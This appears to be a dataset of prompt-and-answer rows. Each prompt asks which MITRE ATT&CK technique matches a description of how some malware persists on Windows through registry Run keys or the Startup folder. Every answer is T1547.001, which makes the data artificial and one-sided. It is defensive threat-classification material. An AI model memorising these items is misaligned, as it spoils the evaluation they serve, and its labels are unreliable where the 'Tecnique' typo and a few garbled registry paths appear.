+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carbanak stores a configuration files in the startup directory to automatically execute commands in order to persist across reboots.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Carberp has maintained persistence by placing itself inside the current user's startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cardinal RAT establishes Persistence by setting the HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load Registry key to point to its executable.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ChChes establishes persistence by adding a Registry Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chaes has added persistence via the Registry key software\microsoft\windows\currentversion\run\microsoft windows html help.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Chinoxy has established persistence via the `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` registry key and by loading a dropper to `(%COMMON_ STARTUP%\\eoffice.exe)`.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Clambling can establish persistence by adding a Registry run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Cobian RAT creates an autostart Registry key to ensure persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Comnie achieves persistence by adding a shortcut of itself to the startup path in the Registry.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Conficker adds Registry Run keys to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: One persistence mechanism used by CozyCar is to set itself to be executed at system startup by adding a Registry value under one of the following Registry keys: HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Crimson can add Registry run keys for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: CrossRAT uses run keys for persistence on Windows.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkComet adds several Registry entries to enable automatic execution at every system startup.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkGate installation includes AutoIt script execution creating a shortcut to itself as an LNK object, such as bill.lnk, in the victim startup folder. DarkGate installation finishes with the creation of a registry Run key.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DarkTortilla has established persistence via the `Software\Microsoft\Windows NT\CurrentVersion\Run` registry key and by creating a .lnk shortcut file in the Windows startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DnsSystem can write itself to the Startup folder to gain persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DownPaper uses PowerShell to add a Registry Run key in order to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: DustySky achieves persistence by creating a Registry entry in HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EVILNUM can achieve persistence through the Registry Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If establishing persistence by installation as a new service fails, one variant of Elise establishes persistence for the created .exe file by setting the following Registry key: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\svchost : %APPDATA%\Microsoft\Network\svchost.exe. Other variants have set the following Registry keys for persistence: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\imejp : [self] and HKCU\Software\Microsoft\Windows\CurrentVersion\Run\IAStorD.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Variants of Emissary have added Run Registry keys to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Emotet has been observed adding the downloaded payload to the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to maintain persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Empire can modify the registry run keys HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilBunny has created Registry keys for persistence in [HKLM|HKCU]\…\CurrentVersion\Run.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: EvilGrab adds a Registry Run key for ctfmon.exe to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FELIXROOT adds a shortcut file to the startup folder for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FLASHFLOOD achieves persistence by making an entry in the Registry's Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FatDuke has used HKLM\SOFTWARE\Microsoft\CurrentVersion\Run to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FinFisher establishes persistence by creating the Registry key HKCU\Software\Microsoft\Windows\Run.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Final1stspy creates a Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Flagpro has dropped an executable file to the startup directory.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FlawedAmmyy has established persistence via the `HKCU\SOFTWARE\microsoft\windows\currentversion\run` registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: FunnyDream can use a Registry Run Key and the Startup folder to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GRIFFON has used a persistence module that stores the implant inside the Registry, which executes at logon.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gazer can establish persistence by creating a .lnk file in the Start menu.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gelsemium can set persistence with a Registry run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Gold Dragon establishes persistence in the Startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Grandoreiro can use run keys and create link files in the startup folder for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GrimAgent can set persistence with a Registry run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: GuLoader can establish persistence via the Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: HTTPBrowser has established persistence by setting the HKCU\Software\Microsoft\Windows\CurrentVersion\Run key value for wdm to the path of the executable. It has also used the Registry entry HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run vpdn “%ALLUSERPROFILE%\%APPDATA%\vpdn\VPDN_LU.exe” to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hancitor has added Registry Run keys to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Helminth establishes persistence by creating a shortcut in the Start Menu folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Heyoka Backdoor can establish persistence with the auto start function including using the value `EverNoteTrayUService`.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Hi-Zor creates a Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: IcedID has established persistence by creating a Registry run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Some InnaputRAT variants establish persistence by modifying the Registry key HKU\\Software\Microsoft\Windows\CurrentVersion\Run:%appdata%\NeutralApp\NeutralApp.exe .,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: InvisiMole can place a lnk file in the Startup Folder to achieve persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ixeshe can achieve persistence by adding itself to the HKCU\Software\Microsoft\Windows\CurrentVersion\Run Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JCry has created payloads in the Startup directory to maintain persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: JHUHUGIT has used a Registry Run key to establish persistence by executing JavaScript code within the rundll32.exe process.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: KOCTOPUS can set the AutoRun Registry key with a PowerShell command.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: A version of KONNI has dropped a Windows shortcut into the Startup folder to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kasidet creates a Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Kazuar adds a sub-key under several Registry run keys.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Koadic has added persistence to the `HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run` Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LiteDuke can create persistence by adding a shortcut in the CurrentVersion\Run Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LoJax has modified the Registry key ‘HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\BootExecute’ from ‘autocheck autochk *’ to ‘autocheck autoche *’ in order to execute its payload during Windows startup.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: LookBack sets up a Registry Run key to establish a persistence mechanism.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Lucifer can persist by setting Registry key values HKLM\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic and HKCU\Software\Microsoft\Windows\CurrentVersion\Run\QQMusic.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MCMD can use Registry Run Keys for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Machete used the startup folder for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MarkiRAT can drop its payload into the Startup directory to ensure it automatically runs when the compromised system is started.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Matryoshka can establish persistence by adding Registry Run keys.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Maze has created a file named ""startup_vrun.bat"" in the Startup folder of a virtual machine to establish persistence.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Metamorfo has configured persistence to the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run, Spotify =% APPDATA%\Spotify\Spotify.exe and used .LNK files in the startup folder to achieve persistence.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mispadu creates a link in the startup folder for persistence. Mispadu adds persistence via the registry key `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mivast creates the following Registry entry: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Micromedia.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: MoleNet can achieve persitence on the infected machine by setting the Registry run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mongall can establish persistence with the auto start function including using the value `EverNoteTrayUService`.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Mosquito establishes persistence under the Registry key HKCU\Software\Run auto_update.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: The ""SCOUT"" variant of NETEAGLE achieves persistence by adding itself to the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NETWIRE creates a Registry start-up entry to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NOKKI has established persistence by writing the payload to the Registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanHaiShu modifies the %regrun% Registry to point itself to an autostart mechanism.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NanoCore creates a RunOnce key in the Registry to execute its VBS scripts each time the user logs on to the machine.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: NavRAT creates a Registry key to ensure a file gets executed upon reboot in order to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Nebulae can achieve persistence through a Registry Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: ObliqueRAT can gain persistence by a creating a shortcut in the infected user's Startup directory.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Octopus achieved persistence by placing a malicious executable in the startup directory and has added the HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run key to the Registry.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Okrum establishes persistence by creating a .lnk shortcut to itself in the Startup folder.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PLAINTEE gains persistence by adding the Registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERSOURCE achieves persistence by setting a Registry Run key, with the path depending on whether the victim account has user or administrator access.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: POWERTON can install a Registry Run key for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PUNCHBUGGY has been observed using a Registry Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pisloader establishes persistence via a Registry Run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PlugX adds Run key entries in the Registry to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoetRAT has added a registry key in the hive for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PoisonIvy creates run key Registry entries pointing to a malicious executable dropped to disk.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerDuke achieves persistence by using various Registry Run keys.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerShower sets up persistence with a Registry run key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: PowerSploit's New-UserPersistenceOption Persistence argument can be used to establish via the HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Prikormka adds itself to a Registry Run key with the name guidVGA or guidVSA.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pteranodon copies itself to the Startup folder to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Pupy adds itself to the startup folder or adds itself to the Registry key SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: QakBot can maintain persistence by creating an auto-run Registry key.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: If the QuasarRAT client process does not have administrator privileges it will add a registry key to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run` for persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RCSession has the ability to modify a Registry Run key to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+"Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: RTM tries to add a Registry Run key under the name ""Windows Update"" to establish persistence.","Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
+Please help to identify the following description belonging to which technique in MITRE and the corresponding tactics: Ramsay has created Registry Run keys to establish persistence.,"Tecnique: T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder, Tactic: TA0003 Persistence TA0004 Privilege Escalation "
